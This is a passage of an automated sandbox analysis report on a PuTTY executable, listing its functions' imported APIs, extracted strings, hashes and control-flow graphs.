                      • Opcode Fuzzy Hash: 1e88966224fd870200e04f82941f27a47510af761bce352db075fa57f9858920
                      • Instruction Fuzzy Hash: BE32D333A2868281FB60DB36E4147AA7B90FB94B84F644135DE4D87B98DF3CD945DB08

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc$ClipboardFormatInitializeLibraryLoadMessageRegister
                      • String ID: %s Fatal Error$AdjustWindowRectExForDpi$Failed to initialize COM subsystem$FlashWindowEx$GetDpiForMonitor$GetMonitorInfoA$GetSystemMetricsForDpi$MSWHEEL_ROLLMSG$MonitorFromPoint$MonitorFromWindow$PlaySoundA$ToUnicodeEx$shcore.dll$user32.dll$winmm.dll
                      • API String ID: 4030309821-128400427
                      • Opcode ID: 6ab206a9a58c67f68d16a2be7d32ebdfe3068d0f9bd6b9b9d91e215b1ad1a286
                      • Instruction ID: 050e8afd5ed868bc4b797d6722a7e4ea8346d811e8a97dbd7a11f4e7c7c1705d
                      • Opcode Fuzzy Hash: 6ab206a9a58c67f68d16a2be7d32ebdfe3068d0f9bd6b9b9d91e215b1ad1a286
                      • Instruction Fuzzy Hash: 14419F23E2DB02A0FA42AB35E85517A2B91AF55B80F740132CD0DC6765EF2CED46E75C
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Text$DialogExtentItemMessageModeObjectPointRectSelectSend
                      • String ID: !dp->shortcuts[s]$&$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$EDIT$STATIC$ncols <= lenof(columns)$ret == c$thisc$win
                      • API String ID: 3577962795-4092102353
                      • Opcode ID: ec6d94e86e4548b55d565a1d0e12ac1d8a0f0232561a0fe27072ccf633115005
                      • Instruction ID: 86db64f917dea463378c6cbe125d1067e656c4e4abe1eb002f85e5b0c0d11a5e
                      • Opcode Fuzzy Hash: ec6d94e86e4548b55d565a1d0e12ac1d8a0f0232561a0fe27072ccf633115005
                      • Instruction Fuzzy Hash: B622D363A18AC285FB609B29D4443BA7BA1FF94784F644135DE8D83795EF3CE944CB08

                      Control-flow Graph

                      control_flow_graph 2823 7ff6785dcb24-7ff6785dcb61 call 7ff678606ec0 call 7ff678611b80 call 7ff678609070 call 7ff6785d6c80 call 7ff6785d6cf0 2834 7ff6785dcb63-7ff6785dcb6d call 7ff6786125d0 2823->2834 2835 7ff6785dcb82-7ff6785dcb8f call 7ff6785d6da0 2823->2835 2840 7ff6785dcb6f-7ff6785dcb79 call 7ff6785f2a50 2834->2840 2841 7ff6785dcb91-7ff6785dcba1 call 7ff678606d60 2834->2841 2835->2841 2842 7ff6785dcbac-7ff6785dcbaf 2835->2842 2840->2841 2855 7ff6785dcb7b-7ff6785dcb7d call 7ff6785d6bd0 2840->2855 2851 7ff6785dce44-7ff6785dce6d call 7ff6786090c0 call 7ff678611d70 call 7ff678611b80 2841->2851 2852 7ff6785dcba7 2841->2852 2844 7ff6785dcbb1-7ff6785dcbce call 7ff6786176a0 2842->2844 2845 7ff6785dcbec-7ff6785dcbf4 call 7ff678606d60 2842->2845 2844->2845 2858 7ff6785dcbd0-7ff6785dcbea 2844->2858 2859 7ff6785dce3a-7ff6785dce42 2845->2859 2857 7ff6785dce72-7ff6785dce9e call 7ff6786139c0 call 7ff67868a9f0 2851->2857 2852->2857 2855->2835 2864 7ff6785dcc38-7ff6785dcc42 2858->2864 2859->2851 2861 7ff6785dce9f-7ff6785dcea9 call 7ff678606e50 2859->2861 2861->2857 2877 7ff6785dceab-7ff6785dceae call 7ff6785f2a50 2861->2877 2865 7ff6785dcc44-7ff6785dcc4b 2864->2865 2866 7ff6785dcc50 2864->2866 2870 7ff6785dcc52-7ff6785dcc6d call 7ff678605310 2865->2870 2866->2870 2881 7ff6785dcc6f-7ff6785dcc72 2870->2881 2882 7ff6785dcc20 2870->2882 2880 7ff6785dceb3-7ff6785dceb5 2877->2880 2880->2857 2883 7ff6785dceb7 2880->2883 2884 7ff6785dcc74-7ff6785dcc77 2881->2884 2885 7ff6785dcc2a-7ff6785dcc32 2881->2885 2886 7ff6785dcc23-7ff6785dcc27 2882->2886 2890 7ff6785dcebc-7ff6785dcec5 call 7ff6785f4690 call 7ff678698284 2883->2890 2887 7ff6785dcc90-7ff6785dcca1 call 7ff67869fc60 2884->2887 2888 7ff6785dcc79 2884->2888 2885->2864 2889 7ff6785dce27-7ff6785dce34 call 7ff678606d60 2885->2889 2886->2885 2900 7ff6785dceca-7ff6785dcf13 call 7ff678612890 * 2 call 7ff678616310 2887->2900 2901 7ff6785dcca7-7ff6785dccb4 call 7ff67869fc60 2887->2901 2891 7ff6785dcc80-7ff6785dcc8b call 
7ff6785d6f80 2888->2891 2889->2859 2902 7ff6785dcf42-7ff6785dcf73 call 7ff6786090c0 call 7ff678611d70 call 7ff6785f2a50 call 7ff6785d6bd0 2889->2902 2890->2900 2891->2886 2933 7ff6785dcf15 call 7ff67860e090 2900->2933 2934 7ff6785dcf1a-7ff6785dcf2c call 7ff678613590 * 2 call 7ff678698284 2900->2934 2910 7ff6785dcf31-7ff6785dcf3d call 7ff678616430 call 7ff678698284 2901->2910 2911 7ff6785dccba-7ff6785dccc1 2901->2911 2910->2902 2914 7ff6785dccc3-7ff6785dccd4 call 7ff67869fc60 2911->2914 2915 7ff6785dcd1f-7ff6785dcd2c call 7ff67869fc60 2911->2915 2914->2890 2932 7ff6785dccda-7ff6785dcceb call 7ff67869fc60 2914->2932 2929 7ff6785dcd2e-7ff6785dcd3f call 7ff67869fc60 2915->2929 2930 7ff6785dcd58-7ff6785dcd5c 2915->2930 2946 7ff6785dcd6e-7ff6785dcd77 2929->2946 2947 7ff6785dcd41-7ff6785dcd46 2929->2947 2939 7ff6785dcd62-7ff6785dcd69 2930->2939 2940 7ff6785dcbf9-7ff6785dcc1d 2930->2940 2932->2890 2948 7ff6785dccf1-7ff6785dcd02 call 7ff67869fc60 2932->2948 2933->2934 2934->2910 2939->2891 2940->2882 2952 7ff6785dce0e-7ff6785dce15 2946->2952 2953 7ff6785dcd7d-7ff6785dcdac call 7ff67869e168 2946->2953 2950 7ff6785dce02-7ff6785dce09 2947->2950 2951 7ff6785dcd4c-7ff6785dcd53 2947->2951 2948->2890 2959 7ff6785dcd08-7ff6785dcd19 call 7ff67869fc60 2948->2959 2950->2891 2951->2891 2952->2891 2960 7ff6785dcdae-7ff6785dcdb8 call 7ff6785d6f80 2953->2960 2961 7ff6785dcdbd-7ff6785dcdc9 call 7ff678613bc0 2953->2961 2959->2890 2959->2915 2960->2961 2967 7ff6785dcdd0-7ff6785dcde8 call 7ff67869e2f0 2961->2967 2970 7ff6785dce1a-7ff6785dce22 call 7ff67869d968 2967->2970 2971 7ff6785dcdea-7ff6785dce00 call 7ff678612af0 2967->2971 2970->2886 2971->2967
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: DeleteObject$DestroyIconUninitialize
                      • String ID: %s Warning$%s expects an output filename$%s expects input and output filenames$--host-ca$--host_ca$-cleanup$-demo-config-box$-demo-terminal$-pgpfp$This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?$can't open input file '%s'$demo-server.example.com$option "%s" requires an argument$unexpected argument "%s"$unknown option "%s"
                      • API String ID: 1128191211-528882638
                      • Opcode ID: 4a2046309144862b578dab4bd3a57a42867108dd8b234306e9b228e6a68a3681
                      • Instruction ID: e12ecc5b8200a38ace597d95803dfc5e17c80c4780845ec164c24b762e9d8fd7
                      • Opcode Fuzzy Hash: 4a2046309144862b578dab4bd3a57a42867108dd8b234306e9b228e6a68a3681
                      • Instruction Fuzzy Hash: 8AB13D63A3C50391FE94A73194912BA2E91AF41B90F744435ED0ECB7D6DE2CED02A39D

                      Control-flow Graph

                      control_flow_graph 3169 7ff6785dd100-7ff6785dd10c 3170 7ff6785dd114-7ff6785dd122 call 7ff6786162c0 3169->3170 3171 7ff6785dd10e-7ff6785dd113 3169->3171 3173 7ff6785dd127-7ff6785dd12d 3170->3173 3174 7ff6785dd12f-7ff6785dd149 GetProcAddress 3173->3174 3175 7ff6785dd176 3173->3175 3176 7ff6785dd181-7ff6785dd189 FreeLibrary 3174->3176 3177 7ff6785dd14b-7ff6785dd152 3174->3177 3175->3176 3180 7ff6785dd190-7ff6785dd1b7 FindResourceA 3176->3180 3178 7ff6785dd1f1 3177->3178 3179 7ff6785dd158-7ff6785dd166 3177->3179 3182 7ff6785dd1f8-7ff6785dd1fb 3178->3182 3179->3180 3183 7ff6785dd168-7ff6785dd172 3179->3183 3180->3178 3181 7ff6785dd1b9-7ff6785dd1c9 SizeofResource 3180->3181 3181->3178 3184 7ff6785dd1cb-7ff6785dd1dd LoadResource 3181->3184 3182->3171 3185 7ff6785dd201-7ff6785dd21a call 7ff6786169b0 3182->3185 3183->3181 3186 7ff6785dd174 3183->3186 3184->3178 3187 7ff6785dd1df-7ff6785dd1ef LockResource 3184->3187 3190 7ff6785dd23b-7ff6785dd249 3185->3190 3191 7ff6785dd21c-7ff6785dd235 call 7ff6786169b0 3185->3191 3186->3178 3187->3182 3190->3171 3191->3171 3191->3190
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: HtmlHelpA$Software\SimonTatham\PuTTY64\CHMPath$Software\SimonTatham\PuTTY\CHMPath$hhctrl.ocx
                      • API String ID: 190572456-509675872
                      • Opcode ID: a0bc5a2a65dc4d9eae7fa86a812b878beada9e314c77d15a1f4f1c0575aebb16
                      • Instruction ID: 455a3ac43823aa67039d0391d75544365badba3962412d75d389373549c00893
                      • Opcode Fuzzy Hash: a0bc5a2a65dc4d9eae7fa86a812b878beada9e314c77d15a1f4f1c0575aebb16
                      • Instruction Fuzzy Hash: F9315E63E2D743A1FA958779A85C3362E90AF26780F345034CA0DC63D4DE2CFC85A718

                      Control-flow Graph

                      Strings
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: !ctrl->delay_taborder$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$BUTTON$STATIC$false && "bad control type in winctrl_layout"$i < ntabdelays$ncols <= lenof(columns)$ntabdelays < lenof(tabdelays)$ret == c
                      • API String ID: 1949149715-1213610268
                      • Opcode ID: bfba1759a0df8782f979f6f4575ff45775d3f30527cdd1423e35be01de23b612
                      • Instruction ID: 59b34c3dc9d05bde51b0fe87297d96dd52fb8a59d5442ab018372f786641cc68
                      • Opcode Fuzzy Hash: bfba1759a0df8782f979f6f4575ff45775d3f30527cdd1423e35be01de23b612
                      • Instruction Fuzzy Hash: 9352C173A18B8186E7218B29E4453AABBA0FB99794F144335DF8C93794EF3CE545CB04

                      Control-flow Graph

                      APIs
                      Strings
                      Similarity
                      • API ID: NameUser$AddressProc
                      • String ID: GetUserNameExA$secur32.dll$sspicli.dll
                      • API String ID: 9235790-676772081
                      • Opcode ID: 51967d74fa85260e4ba4e7d391479f03c81e0dd2628215960d683692680a8cc6
                      • Instruction ID: 640c0f5a6d86c64c0f1a21efb1366d1511ebc5eb1b5d6772878e9efd405361c1
                      • Opcode Fuzzy Hash: 51967d74fa85260e4ba4e7d391479f03c81e0dd2628215960d683692680a8cc6
                      • Instruction Fuzzy Hash: 4031C422E3C15272F6519B36A41437F1F419F84B84F608035C84E8BBC5DE3CED02AB08

                      Control-flow Graph

                      APIs
                      Strings
                      Similarity
                      • API ID: AddressProc$Startup$LibraryLoad
                      • String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyname$gethostname$getnameinfo$getpeername$getservbyname$htonl$htons$inet_addr$inet_ntoa$inet_ntop$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll$wsock32.dll
                      • API String ID: 1450042416-3487058210
                      • Opcode ID: 63f1f37c3d983cc709cba1ade68d615c3cf9c675a72a3cd915984577514d7544
                      • Instruction ID: 3255a96c4cca4222781e536e05c08a35deadfaae3b59d46745c12a188baabe4c
                      • Opcode Fuzzy Hash: 63f1f37c3d983cc709cba1ade68d615c3cf9c675a72a3cd915984577514d7544
                      • Instruction Fuzzy Hash: 4912E76A93AB17A0FA45CB74E8647323EA2AF64750F740435C40DCA264EF6CFD44AA5C
                      APIs
                      Strings
                      Similarity
                      • API ID: ItemMessageSend_set_error_mode
                      • String ID: !dp->shortcuts[s]$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$0$COMBOBOX$LISTBOX$STATIC$ret == c$ud
                      • API String ID: 3184551911-1172212562
                      • Opcode ID: 9f20c77925bbc0044631ccf326b4f83694382a9a88885be6bc3de373428def9f
                      • Instruction ID: 01a6f40fd78a86455962911c5b73b8f5e19c6faa312addbf40ab0c481e533b41
                      • Opcode Fuzzy Hash: 9f20c77925bbc0044631ccf326b4f83694382a9a88885be6bc3de373428def9f
                      • Instruction Fuzzy Hash: 54D1D173A182828AE774CF25E444BABBBA5F784784F144239DA5987B89DF3CD904CF04

                      Control-flow Graph

                      APIs
                      Strings
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: DrawInsert$InitCommonControls$LBItemFromPt$MakeDragList$comctl32.dll
                      • API String ID: 2238633743-1292723818
                      • Opcode ID: 94718e5887e2b781b78c5227e31c79f2b51bffc4c732e88a8550ad2025163722
                      • Instruction ID: d552d1d2b00c79e197f4cc7a5a50f37c29c7f2ca3c75107c88d2da8571b6c43e
                      • Opcode Fuzzy Hash: 94718e5887e2b781b78c5227e31c79f2b51bffc4c732e88a8550ad2025163722
                      • Instruction Fuzzy Hash: 17F0446AA29A06A0E901AB25FD540A62B55AF147C1F719132C90CC2724DE3CE947A758

                      Control-flow Graph

                      APIs
                      Similarity
                      • API ID: Message$DialogWindow$ClassCreateCursorDestroyDispatchLoadLongParamPostQuitRegister
                      • String ID:
                      • API String ID: 4008243408-0
                      • Opcode ID: 8dc0eb86304c87fce5710041ab16b5df4aff4e4aec2429a9720ab6fd90c5c869
                      • Instruction ID: 01650e4c50b8c4cf4f918d4c061ae1880b28003d0181677972f61aca2c0d8534
                      • Opcode Fuzzy Hash: 8dc0eb86304c87fce5710041ab16b5df4aff4e4aec2429a9720ab6fd90c5c869
                      • Instruction Fuzzy Hash: 93418022A18BC195E760CB25F8043AB7BA0FB99790F604174DE8D87768DF3CD949DB04

                      Control-flow Graph

                      APIs
                      Strings
                      Similarity
                      • API ID: MessageSend
                      • String ID: !dp->shortcuts[s]$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$BUTTON$ncols <= lenof(columns)$ret == c
                      • API String ID: 3850602802-881213205
                      • Opcode ID: 15038341bca84f7f5042ea09811a7eff4d436e285bc1cfc11302dc7fc67c737a
                      • Instruction ID: 820e25b10a8c4faac66f18376f37207ec05cd4cf80e9820740bdd12db06e94c4
                      • Opcode Fuzzy Hash: 15038341bca84f7f5042ea09811a7eff4d436e285bc1cfc11302dc7fc67c737a
                      • Instruction Fuzzy Hash: 58D1D063A186C185FB618B29A4453FABBA1FF94784F144235DE8D83794EF7CE944CB08

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/config.c$Default Settings$demo-server$demo-server-2
                      • API String ID: 0-294979178
                      • Opcode ID: 589f9e8e79dd31173eb59e23a9f425e712c61965e9abdc51a7d0c42d5eb83586
                      • Instruction ID: ec33dfaf0a811189f4c0a9ef8b9b1977237fc462de4cf3ab0485bd3b9e95aeeb
                      • Opcode Fuzzy Hash: 589f9e8e79dd31173eb59e23a9f425e712c61965e9abdc51a7d0c42d5eb83586
                      • Instruction Fuzzy Hash: 30E11763B3968261EA109F32E9047BB6F91AB45FC0F694435CE4D977D6DE3CE844A308

                      Control-flow Graph

                      APIs
                      Strings
                      Similarity
                      • API ID: Window$CreateDialogMessageRectSend
                      • String ID: LISTBOX
                      • API String ID: 4261271132-1812161947
                      • Opcode ID: 4675824aa6d38a0693fc2184b3d9715887497bee4671b815ee1fa70ff92b6202
                      • Instruction ID: cbcda1e7e940ae546faa23a5a253dc3a61963b2becdcf0e87239caa86435bc28
                      • Opcode Fuzzy Hash: 4675824aa6d38a0693fc2184b3d9715887497bee4671b815ee1fa70ff92b6202
                      • Instruction Fuzzy Hash: 9F218F7361868187E7648F16F840A5ABBA0F758BA4F248135EF8D83B54DF3CE940CB04
                      APIs
                      Strings
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6785F9C72
                      • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF6785F9C6B
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                      • API String ID: 3015471070-2883471717
                      • Opcode ID: c90d57f835871b3c7a2068380126451181b6ba045c18c22e5594f4d080dd311e
                      • Instruction ID: a0d7632cba9d6683b3dddaa6a00c800399a3994944aae1a606582bad0a4c0506
                      • Opcode Fuzzy Hash: c90d57f835871b3c7a2068380126451181b6ba045c18c22e5594f4d080dd311e
                      • Instruction Fuzzy Hash: CC219133B28A4596FB618B26E8807B97F90BB94B84F644035CE0D87791DE3DD841DB08
                      APIs
                      • SetCurrentProcessExplicitAppUserModelID.SHELL32(?,?,?,?,00007FF6785D51CB), ref: 00007FF6785FB0A2
                      • GetProcAddress.KERNEL32(?,?,?,?,00007FF6785D51CB), ref: 00007FF6785FB0D1
                      Strings
                      Similarity
                      • API ID: AddressCurrentExplicitModelProcProcessUser
                      • String ID: SetCurrentProcessExplicitAppUserModelID$Shell32.dll
                      • API String ID: 3773935857-666802935
                      • Opcode ID: 0f7a0512b40ab475cb57f40d5e68047ef61245add5cc39f49632a0cdccdf3a37
                      • Instruction ID: 5463b9bd19fffa403fee2cfab67b40269213c0786c1d362e16755980acbac4e5
                      • Opcode Fuzzy Hash: 0f7a0512b40ab475cb57f40d5e68047ef61245add5cc39f49632a0cdccdf3a37
                      • Instruction Fuzzy Hash: BFF04F16E3A703A0FD95AB3598683322A986F24780F700434C40DC23A0EE3CFC45BA19
                      APIs
                      • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                      • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616551
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616565
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                      Similarity
                      • API ID: Close$CreateOpen
                      • String ID:
                      • API String ID: 1299239824-0
                      • Opcode ID: ea6bdc6d0fe87ce883ce7ae428e77d2f7ab380fdb98498e39f7f47fe4c6a4590
                      • Instruction ID: 4579977186eed10a6eb61b97f6f0b8f7bafe9b36066a8b13f670d8ad66f710ec
                      • Opcode Fuzzy Hash: ea6bdc6d0fe87ce883ce7ae428e77d2f7ab380fdb98498e39f7f47fe4c6a4590
                      • Instruction Fuzzy Hash: 0731E233E2879251E620CB65B851B2BAB94AB94BD4F600031EE8D87B59DF7CD841EB04
                      APIs
                      Similarity
                      • API ID: Window$Rect$DesktopMove
                      • String ID:
                      • API String ID: 2894293738-0
                      • Opcode ID: 20ecea4b81a27fe78413c901b6bf14b61497c1ef27ae127f0af0f9314dea5a0a
                      • Instruction ID: 230517e177666fd829aa90b8244d139d2aba0a2e486cdeb4ac758269c4263c8a
                      • Opcode Fuzzy Hash: 20ecea4b81a27fe78413c901b6bf14b61497c1ef27ae127f0af0f9314dea5a0a
                      • Instruction Fuzzy Hash: C9119333B2851187EB10CB29F80451BBB60EBD5B90F649130EE8987B5CDE3DE9418F44
                      APIs
                      Strings
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6785F9B8F
                      • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF6785F9B88
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                      • API String ID: 3015471070-2883471717
                      • Opcode ID: f2c6e618a18827751ec8177bb15fb0ac7d5fcf813854ffeaddd1338c36183962
                      • Instruction ID: ca8e6b9f298134e8ada5857bcf7b8f81e30ffd0bce9e2b7409b13021a72d8a35
                      • Opcode Fuzzy Hash: f2c6e618a18827751ec8177bb15fb0ac7d5fcf813854ffeaddd1338c36183962
                      • Instruction Fuzzy Hash: BF210533B28A0591FBA08B26C8447A93B90FB99BD4F644035CE0D83790DE3CDC86CB08
                      APIs
                      • GetEnvironmentStringsW.KERNELBASE(?,?,0000022102F9DBB0,00007FF67869AC4F), ref: 00007FF6786AAD35
                      • FreeEnvironmentStringsW.KERNEL32(?,?,0000022102F9DBB0,00007FF67869AC4F), ref: 00007FF6786AADA7
                        • Part of subcall function 00007FF6786A5070: RtlAllocateHeap.NTDLL(?,?,?,00007FF6786A3F1F), ref: 00007FF6786A50AE
                      • FreeEnvironmentStringsW.KERNEL32(?,?,0000022102F9DBB0,00007FF67869AC4F), ref: 00007FF6786AAE06
                        • Part of subcall function 00007FF6786A44E4: HeapFree.KERNEL32(?,?,?,00007FF6786A8382,?,?,?,00007FF6786A7F43,?,?,00000000,00007FF6786A8C14,?,?,?,00007FF6786A8B1F), ref: 00007FF6786A44FA
                        • Part of subcall function 00007FF6786A44E4: GetLastError.KERNEL32(?,?,?,00007FF6786A8382,?,?,?,00007FF6786A7F43,?,?,00000000,00007FF6786A8C14,?,?,?,00007FF6786A8B1F), ref: 00007FF6786A4504
                      Similarity
                      • API ID: EnvironmentFreeStrings$Heap$AllocateErrorLast
                      • String ID:
                      • API String ID: 1848424169-0
                      • Opcode ID: a45e6d22cd07cd63e0af45f8e0aec387eba93631c0cee08984bed8e70762c5ed
                      • Instruction ID: 044e9115930f9e0cdd1af2cc133dbd9e3a492147ae3abfae350b9c1d091f4a76
                      • Opcode Fuzzy Hash: a45e6d22cd07cd63e0af45f8e0aec387eba93631c0cee08984bed8e70762c5ed
                      • Instruction Fuzzy Hash: 4831B723A2876295E664EF32644007B7EA0FF44BD1F644136EA8E83BD5DF3CE8115749
                      APIs
                      Similarity
                      • API ID: Window$ItemLongText
                      • String ID:
                      • API String ID: 1037592912-0
                      • Opcode ID: 2f7e87638be09f0d97eed6ddadb0bd939be1b2192e324775db65a7082ae107af
                      • Instruction ID: 8f1f8556b9fecd82a0adc09b9972957f839501792e886a507da92a7f2cd83c97
                      • Opcode Fuzzy Hash: 2f7e87638be09f0d97eed6ddadb0bd939be1b2192e324775db65a7082ae107af
                      • Instruction Fuzzy Hash: 7BF0C813B25511C2FE195772A84467A2691DF55F90F348130C92DCA3E8DE2C9D83D70C
                      APIs
                      Similarity
                      • API ID: Window$ActiveCreateDialogParamShow
                      • String ID:
                      • API String ID: 4156068129-0
                      • Opcode ID: 594769b5ef74b6407d61c6ea7239f5212f48eb2a6803754689cca1e48bf82949
                      • Instruction ID: 7df9662346cd06a16cdf8539e01e845e47cb725331f0546ac4fc44865638e4ed
                      • Opcode Fuzzy Hash: 594769b5ef74b6407d61c6ea7239f5212f48eb2a6803754689cca1e48bf82949
                      • Instruction Fuzzy Hash: 83E0121AA39A2192F7049B35A8187762721AB98B50F504430CC5EC2764CF3CDA469E08
                      APIs
                      Similarity
                      • API ID: LongWindow
                      • String ID:
                      • API String ID: 1378638983-0
                      • Opcode ID: e97cadac6e52da1d43d57e83d769fa2f00492fef06e9a45af8a1d9a733207641
                      • Instruction ID: 35fd091c643fda16b6069d0cfb9a6ffd13ece808ff3d46c299b1601f46c73dd9
